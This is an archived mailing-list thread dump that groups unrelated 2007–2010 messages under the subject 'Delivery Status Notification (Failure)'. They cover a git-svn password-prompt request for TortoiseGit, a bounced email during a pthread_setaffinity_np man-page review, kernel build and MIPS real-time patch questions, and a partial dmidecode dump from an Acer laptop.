  To: Frank Li; +Cc: Tay Ray Chuan, git, normalperson

> The basic requirement is git svn can provide a way to prompt a dialog
> box to input passwd.

Yeah, it's a very basic use case, but I don't know whether there is a
workaround for it somehow, maybe perl gurus or git svn users could
help more...

My company, where there are windows users (95% of the company), would
like to use TortoiseGIT as a graphical client for SVN server
repositories as an SVN client, no other way by us, so it'd be high
priority :) So I've got a beer for any volunteer, thanks :P

Best Regards,
Laszlo Papp

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2010-02-02  4:15       ` Tay Ray Chuan
@ 2010-02-02  4:30         ` Frank Li
  2010-02-02  6:37           ` Laszlo Papp
  0 siblings, 1 reply; 183+ messages in thread
From: Frank Li @ 2010-02-02  4:30 UTC (permalink / raw)
  To: Tay Ray Chuan; +Cc: Laszlo Papp, git, normalperson

2010/2/2 Tay Ray Chuan <rctay89@gmail.com>:
> Hi,
>
> On Fri, Jan 29, 2010 at 11:04 PM, Frank Li <lznuaa@gmail.com> wrote:
>> I prefer git-svn can provide environment to launch a external
>> application to input password like open ssh.
>
> how about users who are authenticating over http with basic and
> digest? How does one go about launching an external app for password
> input in those cases?

There are not problem if run git svn clone from console.
But a gui application, such tortoisegit, launch "git svn clone" and
capture git svn clone output.
If passwd needed, git svn clone will read character from console but
GUI application don't know that and wait git svn output.
So there are dead lock till timeout and fail.

The same problem has been happen at ssh.  But OpenSSH provide a
option, environment SSH_ASKPASS, which point to a application. when
passwd need, openssh launch this GUI application,  user can input
passwd at this GUI application.

The basic requirement is git svn can provide a way to prompt a dialog
box to input passwd.

Frank Li

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2010-01-29 15:04     ` Frank Li
  2010-02-01 16:16       ` Laszlo Papp
@ 2010-02-02  4:15       ` Tay Ray Chuan
  2010-02-02  4:30         ` Frank Li
  1 sibling, 1 reply; 183+ messages in thread
From: Tay Ray Chuan @ 2010-02-02  4:15 UTC (permalink / raw)
  To: Frank Li; +Cc: Laszlo Papp, git, normalperson

Hi,

On Fri, Jan 29, 2010 at 11:04 PM, Frank Li <lznuaa@gmail.com> wrote:
> I prefer git-svn can provide environment to launch a external
> application to input password like open ssh.

how about users who are authenticating over http with basic and
digest? How does one go about launching an external app for password
input in those cases?

Please don't take this as a criticism of your personal preference. I
believe this feature would make things convenient for users who want
it - those who don't, nothing changes.

Even ssh (via ssh-keygen) lets you specify the passphrase at
command-run time. Others include htpasswd, htdigest...

-- 
Cheers,
Ray Chuan

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2010-01-29 15:04     ` Frank Li
@ 2010-02-01 16:16       ` Laszlo Papp
  2010-02-02  4:15       ` Tay Ray Chuan
  1 sibling, 0 replies; 183+ messages in thread
From: Laszlo Papp @ 2010-02-01 16:16 UTC (permalink / raw)
  To: Frank Li; +Cc: git, normalperson

On Fri, Jan 29, 2010 at 4:04 PM, Frank Li <lznuaa@gmail.com> wrote:
>>
>> If I use --username option, Frank Li said me it's not enough in
>> TortoiseGIT to provide a popup facility to type the password related
>> to the set --username option.
>>
>
> I prefer git-svn can provide environment to launch a external
> application to input password like open ssh.
>

No perl guru among the volunteers if the original author is not available ? :(

Best Regards,
Laszlo Papp

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <0016e6480ebeedd980047e84e9cc@google.com>
@ 2010-02-01  8:14   ` tingwei liu
  0 siblings, 0 replies; 183+ messages in thread
From: tingwei liu @ 2010-02-01  8:14 UTC (permalink / raw)
  To: netfilter-devel

You'd better to replace function "strstr"

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2010-01-29 14:18   ` Fwd: Delivery Status Notification (Failure) Laszlo Papp
@ 2010-01-29 15:04     ` Frank Li
  2010-02-01 16:16       ` Laszlo Papp
  2010-02-02  4:15       ` Tay Ray Chuan
  0 siblings, 2 replies; 183+ messages in thread
From: Frank Li @ 2010-01-29 15:04 UTC (permalink / raw)
  To: Laszlo Papp; +Cc: git, normalperson

>
> If I use --username option, Frank Li said me it's not enough in
> TortoiseGIT to provide a popup facility to type the password related
> to the set --username option.
>

I prefer git-svn can provide environment to launch a external
application to input password like open ssh.

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <0015175d06406e924104764cbc50@googlemail.com>
@ 2009-10-19 17:08   ` fabio
  0 siblings, 0 replies; 183+ messages in thread
From: fabio @ 2009-10-19 17:08 UTC (permalink / raw)
  To: linux-rt-users

I just installed the rt-patches (rt-24) on top of 2.6.29-rc6 for a MIPS board.

After I noticed that it doesn't compile out of the box, I found out
that it has not been tested on MIPS except for Lemote in 2.6.26 I
think.

Questions:

Is there a schedule date for MIPS  support ? otherwise from which
stable version may I start or even better from which patches should I
start in order to make rt-24 support for MIPS.

Thanks in advance
--
To unsubscribe from this list: send the line "unsubscribe linux-rt-users" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]                           ` <cfd18e0f0811140843q42971316wfade996b67aa2a6-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
@ 2008-11-14 20:45                             ` David Rientjes
  0 siblings, 0 replies; 183+ messages in thread
From: David Rientjes @ 2008-11-14 20:45 UTC (permalink / raw)
  To: mtk.manpages-Re5JQEeQqe8AvxtiuMwx3w
  Cc: Christoph Lameter, Bert Wesarg, Loic Domaigne, Li Zefan,
	Lee Schermerhorn, Hidetoshi Seto,
	linux-man-u79uwXL29TY76Z2rM5mHXA, josv-hpIqsD4AKlfQT0dZR+AlfA,
	brian m. carlson, Stefan Puiu, Karsten Weiss

On Fri, 14 Nov 2008, Michael Kerrisk wrote:

> On Fri, Nov 14, 2008 at 11:39 AM, Christoph Lameter
> <cl-de/tnXTf+JLsfHDXvbKv3WD2FQJk+8+b@public.gmane.org> wrote:
> > It seems that Paul retired.
> 
> Thanks for the info Christoph.
> 

commit c222817f6add85197790e0071f6e511eff14ba25
Author: Paul Jackson <pj-sJ/iWh9BUns@public.gmane.org>
Date:   Fri Oct 3 15:23:42 2008 -0700

    cpusets: remove pj from cpuset maintainers
    
    Remove myself from the kernel MAINTAINERS file for cpusets.  I am leaving
    SGI and probably will not be active in Linux kernel work.  I can be
    reached at <pj-Jdbf3xiKgS8@public.gmane.org>.  Contact Derek Fults <dfults-sJ/iWh9BUns@public.gmane.org> for future
    SGI+cpuset related issues.  I'm off to the next chapter of this good life.
    
    Signed-off-by: Paul Jackson <pj-sJ/iWh9BUns@public.gmane.org>
    Cc: Paul Menage <menage-hpIqsD4AKlfQT0dZR+AlfA@public.gmane.org>
    Cc: Derek Fults <dfults-sJ/iWh9BUns@public.gmane.org>
    Cc: John Hesterberg <jh-sJ/iWh9BUns@public.gmane.org>
    Cc: Paul Jackson <pj-Jdbf3xiKgS8@public.gmane.org>
    Signed-off-by: Andrew Morton <akpm-de/tnXTf+JLsfHDXvbKv3WD2FQJk+8+b@public.gmane.org>
    Signed-off-by: Linus Torvalds <torvalds-de/tnXTf+JLsfHDXvbKv3WD2FQJk+8+b@public.gmane.org>
--
To unsubscribe from this list: send the line "unsubscribe linux-man" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]                       ` <Pine.LNX.4.64.0811141038510.25195-dRBSpnHQED8AvxtiuMwx3w@public.gmane.org>
@ 2008-11-14 16:43                         ` Michael Kerrisk
       [not found]                           ` <cfd18e0f0811140843q42971316wfade996b67aa2a6-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
  0 siblings, 1 reply; 183+ messages in thread
From: Michael Kerrisk @ 2008-11-14 16:43 UTC (permalink / raw)
  To: Christoph Lameter
  Cc: Bert Wesarg, Loic Domaigne, Li Zefan,
	Lee.Schermerhorn-VXdhtT5mjnY, rientjes-hpIqsD4AKlfQT0dZR+AlfA,
	Hidetoshi Seto, linux-man-u79uwXL29TY76Z2rM5mHXA,
	josv-hpIqsD4AKlfQT0dZR+AlfA, brian m. carlson, Stefan Puiu,
	Karsten Weiss

On Fri, Nov 14, 2008 at 11:39 AM, Christoph Lameter
<cl-de/tnXTf+JLsfHDXvbKv3WD2FQJk+8+b@public.gmane.org> wrote:
> It seems that Paul retired.

Thanks for the info Christoph.

-- 
Michael Kerrisk
Linux man-pages maintainer; http://www.kernel.org/doc/man-pages/
git://git.kernel.org/pub/scm/docs/man-pages/man-pages.git
man-pages online: http://www.kernel.org/doc/man-pages/online_pages.html
Found a bug? http://www.kernel.org/doc/man-pages/reporting_bugs.html
--
To unsubscribe from this list: send the line "unsubscribe linux-man" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]                   ` <Pine.LNX.4.64.0811141026080.24886-dRBSpnHQED8AvxtiuMwx3w@public.gmane.org>
@ 2008-11-14 16:39                     ` Christoph Lameter
       [not found]                       ` <Pine.LNX.4.64.0811141038510.25195-dRBSpnHQED8AvxtiuMwx3w@public.gmane.org>
  0 siblings, 1 reply; 183+ messages in thread
From: Christoph Lameter @ 2008-11-14 16:39 UTC (permalink / raw)
  To: mtk.manpages-Re5JQEeQqe8AvxtiuMwx3w
  Cc: Bert Wesarg, Loic Domaigne, Li Zefan,
	Lee.Schermerhorn-VXdhtT5mjnY, rientjes-hpIqsD4AKlfQT0dZR+AlfA,
	Hidetoshi Seto, linux-man-u79uwXL29TY76Z2rM5mHXA,
	josv-hpIqsD4AKlfQT0dZR+AlfA, brian m. carlson, Stefan Puiu,
	Karsten Weiss

It seems that Paul retired.

--
To unsubscribe from this list: send the line "unsubscribe linux-man" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]               ` <cfd18e0f0811140802i2c06e0am164648735fa7dda3-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
@ 2008-11-14 16:26                 ` Christoph Lameter
       [not found]                   ` <Pine.LNX.4.64.0811141026080.24886-dRBSpnHQED8AvxtiuMwx3w@public.gmane.org>
  0 siblings, 1 reply; 183+ messages in thread
From: Christoph Lameter @ 2008-11-14 16:26 UTC (permalink / raw)
  To: mtk.manpages-Re5JQEeQqe8AvxtiuMwx3w
  Cc: Bert Wesarg, Loic Domaigne, Li Zefan,
	Lee.Schermerhorn-VXdhtT5mjnY, rientjes-hpIqsD4AKlfQT0dZR+AlfA,
	Hidetoshi Seto, linux-man-u79uwXL29TY76Z2rM5mHXA,
	josv-hpIqsD4AKlfQT0dZR+AlfA, brian m. carlson, Stefan Puiu,
	Karsten Weiss

Will try to figure out whats going on. Give me a couple of hours.


--
To unsubscribe from this list: send the line "unsubscribe linux-man" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]           ` <36ca99e90811140756q7c445d5ei7c31c5b59df7c7a7-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
@ 2008-11-14 16:02             ` Michael Kerrisk
       [not found]               ` <cfd18e0f0811140802i2c06e0am164648735fa7dda3-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
  0 siblings, 1 reply; 183+ messages in thread
From: Michael Kerrisk @ 2008-11-14 16:02 UTC (permalink / raw)
  To: Bert Wesarg
  Cc: Loic Domaigne, Li Zefan, Lee.Schermerhorn-VXdhtT5mjnY,
	rientjes-hpIqsD4AKlfQT0dZR+AlfA, Hidetoshi Seto,
	Christoph Lameter, linux-man-u79uwXL29TY76Z2rM5mHXA,
	josv-hpIqsD4AKlfQT0dZR+AlfA, brian m. carlson, Stefan Puiu,
	Karsten Weiss

On Fri, Nov 14, 2008 at 10:56 AM, Bert Wesarg
<bert.wesarg-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org> wrote:
> On Fri, Nov 14, 2008 at 16:45, Michael Kerrisk
> <mtk.manpages-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org> wrote:
>> Bother!  Mail to Paul Jackson bounced from the last address I had for
>> him.  Anyway know an up-to-date address?
> Hmm, the last message in linux@vger is from Sep 11.

Yep.  But Paul Jackson <pj-sJ/iWh9BUns@public.gmane.org> isn't working.

(And nothing from Paul since 11 Sep is a longish silence from him.)

>
> Bert
>>
>> On Fri, Nov 14, 2008 at 10:38 AM, Mail Delivery Subsystem
>> <mailer-daemon-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org> wrote:
>>> This is an automatically generated Delivery Status Notification
>>>
>>> Delivery to the following recipient failed permanently:
>>>
>>>     pj-sJ/iWh9BUns@public.gmane.org
>>>
>>> Technical details of permanent failure:
>>> Google tried to deliver your message, but it was rejected by the recipient domain. We recommend contacting the other email provider for further information about the cause of this error. The error that the other server returned was: 550 550 cuda_nsu 5.7.1 <pj-sJ/iWh9BUns@public.gmane.org>: Recipient address rejected: THIS USER IS NO LONGER WITH SGI. CONTACT help-sJ/iWh9BUns@public.gmane.org IF YOU NEED INFO. (state 14).
>>>
>>>   ----- Original message -----
>>>
>>> Received: by 10.180.222.1 with SMTP id u1mr289004bkg.62.1226677136648;
>>>        Fri, 14 Nov 2008 07:38:56 -0800 (PST)
>>> Received: by 10.181.33.19 with HTTP; Fri, 14 Nov 2008 07:38:56 -0800 (PST)
>>> Message-ID: <cfd18e0f0811140738i33f2c671kc99bbb7750f2fa44-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
>>> Date: Fri, 14 Nov 2008 10:38:56 -0500
>>> From: "Michael Kerrisk" <mtk.manpages-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org>
>>> Reply-To: mtk.manpages-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org
>>> To: "Loic Domaigne" <tech-Z4JMKDdsf89Wk0Htik3J/w@public.gmane.org>, "Paul Jackson" <pj-sJ/iWh9BUns@public.gmane.org>
>>> Subject: Re: For review: pthread_setaffinity_np.3
>>> Cc: linux-man-u79uwXL29TY76Z2rM5mHXA@public.gmane.org, josv-hpIqsD4AKlfQT0dZR+AlfA@public.gmane.org,
>>>        "brian m. carlson" <sandals-spVehEqlxw627WubY2PhZQivdfXVPZ6z@public.gmane.org>,
>>>        "Bert Wesarg" <bert.wesarg-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org>,
>>>        "Stefan Puiu" <stefanpuiuro-/E1597aS9LQAvxtiuMwx3w@public.gmane.org>,
>>>        "Karsten Weiss" <K.Weiss-Pt+Xe7GJXK+P2YhJcF5u+nqWYbMAw+HU@public.gmane.org>
>>> In-Reply-To: <cfd18e0f0811140704l18e5741fgdbb5a6c52fb8cbe7-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
>>> MIME-Version: 1.0
>>> Content-Type: text/plain; charset=ISO-8859-1
>>> Content-Transfer-Encoding: 7bit
>>> Content-Disposition: inline
>>> References: <cfd18e0f0811041447w57dd5de4he68ca780ed963074-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
>>>         <4916133A.8060209-Z4JMKDdsf89Wk0Htik3J/w@public.gmane.org>
>>>         <cfd18e0f0811140704l18e5741fgdbb5a6c52fb8cbe7-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
>>>
>>> [CC += "Paul Jackson" <pj-sJ/iWh9BUns@public.gmane.org>, who might want to Ack the patch below]
>>>
>>>>> This might be obvious to all of you, but it wasn't to me... The CPU set used
>>>>> for the affinity is the intersection of the set passed to
>>>>> pthread_setaffinity_np() and the set of processors supported by the
>>>>> kernel...
>>>>>
>>>>> That's why your example shall work, even if the system where it runs has
>>>>> less than 8 processors.
>>>>
>>>
>>>   ----- Message truncated -----
>>>
>>>
>>
>>
>>
>> --
>> Michael Kerrisk
>> Linux man-pages maintainer; http://www.kernel.org/doc/man-pages/
>> git://git.kernel.org/pub/scm/docs/man-pages/man-pages.git
>> man-pages online: http://www.kernel.org/doc/man-pages/online_pages.html
>> Found a bug? http://www.kernel.org/doc/man-pages/reporting_bugs.html
>>
>



-- 
Michael Kerrisk
Linux man-pages maintainer; http://www.kernel.org/doc/man-pages/
git://git.kernel.org/pub/scm/docs/man-pages/man-pages.git
man-pages online: http://www.kernel.org/doc/man-pages/online_pages.html
Found a bug? http://www.kernel.org/doc/man-pages/reporting_bugs.html
--
To unsubscribe from this list: send the line "unsubscribe linux-man" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]       ` <cfd18e0f0811140745k69075aend9686e463c9c1a4d-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
@ 2008-11-14 15:56         ` Bert Wesarg
       [not found]           ` <36ca99e90811140756q7c445d5ei7c31c5b59df7c7a7-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
  0 siblings, 1 reply; 183+ messages in thread
From: Bert Wesarg @ 2008-11-14 15:56 UTC (permalink / raw)
  To: mtk.manpages-Re5JQEeQqe8AvxtiuMwx3w
  Cc: Loic Domaigne, Li Zefan, Lee.Schermerhorn-VXdhtT5mjnY,
	rientjes-hpIqsD4AKlfQT0dZR+AlfA, Hidetoshi Seto,
	Christoph Lameter, linux-man-u79uwXL29TY76Z2rM5mHXA,
	josv-hpIqsD4AKlfQT0dZR+AlfA, brian m. carlson, Stefan Puiu,
	Karsten Weiss

On Fri, Nov 14, 2008 at 16:45, Michael Kerrisk
<mtk.manpages-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org> wrote:
> Bother!  Mail to Paul Jackson bounced from the last address I had for
> him.  Anyway know an up-to-date address?
Hmm, the last message in linux@vger is from Sep 11.

Bert
>
> On Fri, Nov 14, 2008 at 10:38 AM, Mail Delivery Subsystem
> <mailer-daemon-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org> wrote:
>> This is an automatically generated Delivery Status Notification
>>
>> Delivery to the following recipient failed permanently:
>>
>>     pj-sJ/iWh9BUns@public.gmane.org
>>
>> Technical details of permanent failure:
>> Google tried to deliver your message, but it was rejected by the recipient domain. We recommend contacting the other email provider for further information about the cause of this error. The error that the other server returned was: 550 550 cuda_nsu 5.7.1 <pj-sJ/iWh9BUns@public.gmane.org>: Recipient address rejected: THIS USER IS NO LONGER WITH SGI. CONTACT help-sJ/iWh9BUns@public.gmane.org IF YOU NEED INFO. (state 14).
>>
>>   ----- Original message -----
>>
>> Received: by 10.180.222.1 with SMTP id u1mr289004bkg.62.1226677136648;
>>        Fri, 14 Nov 2008 07:38:56 -0800 (PST)
>> Received: by 10.181.33.19 with HTTP; Fri, 14 Nov 2008 07:38:56 -0800 (PST)
>> Message-ID: <cfd18e0f0811140738i33f2c671kc99bbb7750f2fa44-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
>> Date: Fri, 14 Nov 2008 10:38:56 -0500
>> From: "Michael Kerrisk" <mtk.manpages-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org>
>> Reply-To: mtk.manpages-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org
>> To: "Loic Domaigne" <tech-Z4JMKDdsf89Wk0Htik3J/w@public.gmane.org>, "Paul Jackson" <pj-sJ/iWh9BUns@public.gmane.org>
>> Subject: Re: For review: pthread_setaffinity_np.3
>> Cc: linux-man-u79uwXL29TY76Z2rM5mHXA@public.gmane.org, josv-hpIqsD4AKlfQT0dZR+AlfA@public.gmane.org,
>>        "brian m. carlson" <sandals-spVehEqlxw627WubY2PhZQivdfXVPZ6z@public.gmane.org>,
>>        "Bert Wesarg" <bert.wesarg-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org>,
>>        "Stefan Puiu" <stefanpuiuro-/E1597aS9LQAvxtiuMwx3w@public.gmane.org>,
>>        "Karsten Weiss" <K.Weiss-Pt+Xe7GJXK+P2YhJcF5u+nqWYbMAw+HU@public.gmane.org>
>> In-Reply-To: <cfd18e0f0811140704l18e5741fgdbb5a6c52fb8cbe7-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
>> MIME-Version: 1.0
>> Content-Type: text/plain; charset=ISO-8859-1
>> Content-Transfer-Encoding: 7bit
>> Content-Disposition: inline
>> References: <cfd18e0f0811041447w57dd5de4he68ca780ed963074-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
>>         <4916133A.8060209-Z4JMKDdsf89Wk0Htik3J/w@public.gmane.org>
>>         <cfd18e0f0811140704l18e5741fgdbb5a6c52fb8cbe7-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
>>
>> [CC += "Paul Jackson" <pj-sJ/iWh9BUns@public.gmane.org>, who might want to Ack the patch below]
>>
>>>> This might be obvious to all of you, but it wasn't to me... The CPU set used
>>>> for the affinity is the intersection of the set passed to
>>>> pthread_setaffinity_np() and the set of processors supported by the
>>>> kernel...
>>>>
>>>> That's why your example shall work, even if the system where it runs has
>>>> less than 8 processors.
>>>
>>
>>   ----- Message truncated -----
>>
>>
>
>
>
> --
> Michael Kerrisk
> Linux man-pages maintainer; http://www.kernel.org/doc/man-pages/
> git://git.kernel.org/pub/scm/docs/man-pages/man-pages.git
> man-pages online: http://www.kernel.org/doc/man-pages/online_pages.html
> Found a bug? http://www.kernel.org/doc/man-pages/reporting_bugs.html
>
--
To unsubscribe from this list: send the line "unsubscribe linux-man" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found]   ` <001636c5b6831e5a44045ba80779-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org>
@ 2008-11-14 15:45     ` Michael Kerrisk
       [not found]       ` <cfd18e0f0811140745k69075aend9686e463c9c1a4d-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
  0 siblings, 1 reply; 183+ messages in thread
From: Michael Kerrisk @ 2008-11-14 15:45 UTC (permalink / raw)
  To: Loic Domaigne, Li Zefan, Lee.Schermerhorn-VXdhtT5mjnY,
	rientjes-hpIqsD4AKlfQT0dZR+AlfA, Hidetoshi Seto, Christoph
  Cc: linux-man-u79uwXL29TY76Z2rM5mHXA, josv-hpIqsD4AKlfQT0dZR+AlfA,
	brian m. carlson, Bert Wesarg, Stefan Puiu, Karsten Weiss

Bother!  Mail to Paul Jackson bounced from the last address I had for
him.  Anyway know an up-to-date address?

On Fri, Nov 14, 2008 at 10:38 AM, Mail Delivery Subsystem
<mailer-daemon-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org> wrote:
> This is an automatically generated Delivery Status Notification
>
> Delivery to the following recipient failed permanently:
>
>     pj-sJ/iWh9BUns@public.gmane.org
>
> Technical details of permanent failure:
> Google tried to deliver your message, but it was rejected by the recipient domain. We recommend contacting the other email provider for further information about the cause of this error. The error that the other server returned was: 550 550 cuda_nsu 5.7.1 <pj-sJ/iWh9BUns@public.gmane.org>: Recipient address rejected: THIS USER IS NO LONGER WITH SGI. CONTACT help-sJ/iWh9BUns@public.gmane.org IF YOU NEED INFO. (state 14).
>
>   ----- Original message -----
>
> Received: by 10.180.222.1 with SMTP id u1mr289004bkg.62.1226677136648;
>        Fri, 14 Nov 2008 07:38:56 -0800 (PST)
> Received: by 10.181.33.19 with HTTP; Fri, 14 Nov 2008 07:38:56 -0800 (PST)
> Message-ID: <cfd18e0f0811140738i33f2c671kc99bbb7750f2fa44-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
> Date: Fri, 14 Nov 2008 10:38:56 -0500
> From: "Michael Kerrisk" <mtk.manpages-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org>
> Reply-To: mtk.manpages-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org
> To: "Loic Domaigne" <tech-Z4JMKDdsf89Wk0Htik3J/w@public.gmane.org>, "Paul Jackson" <pj-sJ/iWh9BUns@public.gmane.org>
> Subject: Re: For review: pthread_setaffinity_np.3
> Cc: linux-man-u79uwXL29TY76Z2rM5mHXA@public.gmane.org, josv-hpIqsD4AKlfQT0dZR+AlfA@public.gmane.org,
>        "brian m. carlson" <sandals-spVehEqlxw627WubY2PhZQivdfXVPZ6z@public.gmane.org>,
>        "Bert Wesarg" <bert.wesarg-gM/Ye1E23mwN+BqQ9rBEUg@public.gmane.org>,
>        "Stefan Puiu" <stefanpuiuro-/E1597aS9LQAvxtiuMwx3w@public.gmane.org>,
>        "Karsten Weiss" <K.Weiss-Pt+Xe7GJXK+P2YhJcF5u+nqWYbMAw+HU@public.gmane.org>
> In-Reply-To: <cfd18e0f0811140704l18e5741fgdbb5a6c52fb8cbe7-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
> MIME-Version: 1.0
> Content-Type: text/plain; charset=ISO-8859-1
> Content-Transfer-Encoding: 7bit
> Content-Disposition: inline
> References: <cfd18e0f0811041447w57dd5de4he68ca780ed963074-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
>         <4916133A.8060209-Z4JMKDdsf89Wk0Htik3J/w@public.gmane.org>
>         <cfd18e0f0811140704l18e5741fgdbb5a6c52fb8cbe7-JsoAwUIsXosN+BqQ9rBEUg@public.gmane.org>
>
> [CC += "Paul Jackson" <pj-sJ/iWh9BUns@public.gmane.org>, who might want to Ack the patch below]
>
>>> This might be obvious to all of you, but it wasn't to me... The CPU set used
>>> for the affinity is the intersection of the set passed to
>>> pthread_setaffinity_np() and the set of processors supported by the
>>> kernel...
>>>
>>> That's why your example shall work, even if the system where it runs has
>>> less than 8 processors.
>>
>
>   ----- Message truncated -----
>
>



-- 
Michael Kerrisk
Linux man-pages maintainer; http://www.kernel.org/doc/man-pages/
git://git.kernel.org/pub/scm/docs/man-pages/man-pages.git
man-pages online: http://www.kernel.org/doc/man-pages/online_pages.html
Found a bug? http://www.kernel.org/doc/man-pages/reporting_bugs.html
--
To unsubscribe from this list: send the line "unsubscribe linux-man" in
the body of a message to majordomo-u79uwXL29TY76Z2rM5mHXA@public.gmane.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] <00c09f923a4c04465d1a677fdd7aaa@googlemail.com>
@ 2008-02-17 16:30 ` Sisir Koppaka
  0 siblings, 0 replies; 183+ messages in thread
From: Sisir Koppaka @ 2008-02-17 16:30 UTC (permalink / raw)
  To: linux-newbie

The latest kernel source for 2.6.24.2 is not building with make in my
system. It's giving a long list of errors, all of them arising from
/scripts/basic/fixdep - is anybody else having this issue?
-------------
Sisir Koppaka
-
To unsubscribe from this list: send the line "unsubscribe linux-newbie" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.linux-learn.org/faqs

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] <000e0cd299d8043b9fc15979843eaf@googlemail.com>
@ 2007-10-04  0:23 ` Robert Pajak
  0 siblings, 0 replies; 183+ messages in thread
From: Robert Pajak @ 2007-10-04  0:23 UTC (permalink / raw)
  To: linux-acpi

# dmidecode 2.9
SMBIOS 2.4 present.
28 structures occupying 1094 bytes.
Table at 0x000DC010.

Handle 0x0000, DMI type 0, 24 bytes
BIOS Information
	Vendor: Phoenix Technologies LTD
	Version: V1.23
	Release Date: 05/29/2007
	Address: 0xE5880
	Runtime Size: 108416 bytes
	ROM Size: 1024 kB
	Characteristics:
		ISA is supported
		PCI is supported
		PC Card (PCMCIA) is supported
		PNP is supported
		APM is supported
		BIOS is upgradeable
		BIOS shadowing is allowed
		ESCD support is available
		Boot from CD is supported
		ACPI is supported
		USB legacy is supported
		AGP is supported
		BIOS boot specification is supported
		Targeted content distribution is supported

Handle 0x0001, DMI type 1, 27 bytes
System Information
	Manufacturer: Acer
	Product Name: Aspire 9410
	Version: 0100
	Serial Number: LXAGM0X2377290CD572000
	UUID: 133943E0-37B6-11DC-9DC4-DCDF4E75F386
	Wake-up Type: Power Switch
	SKU Number: Not Specified
	Family: Not Specified

Handle 0x0002, DMI type 2, 8 bytes
Base Board Information
	Manufacturer: Acer
	Product Name: Myall2
	Version: Rev
	Serial Number: LXAGM0X2377290CD572000

Handle 0x0003, DMI type 3, 17 bytes
Chassis Information
	Manufacturer: Acer
	Type: Notebook
	Lock: Not Present
	Version: N/A
	Serial Number: None
	Asset Tag: None
	Boot-up State: Safe
	Power Supply State: Safe
	Thermal State: Safe
	Security Status: None
	OEM Information: 0x00001234

Handle 0x0004, DMI type 4, 35 bytes
Processor Information
	Socket Designation: U2E1
	Type: Central Processor
	Family: Other
	Manufacturer: Intel
	ID: EC 06 00 00 FF FB E9 BF
	Version: Genuine Intel(R) CPU           T2
	Voltage: 3.3 V
	External Clock: 133 MHz
	Max Speed: 1860 MHz
	Current Speed: 1860 MHz
	Status: Populated, Enabled
	Upgrade: ZIF Socket
	L1 Cache Handle: 0x0005
	L2 Cache Handle: 0x0006
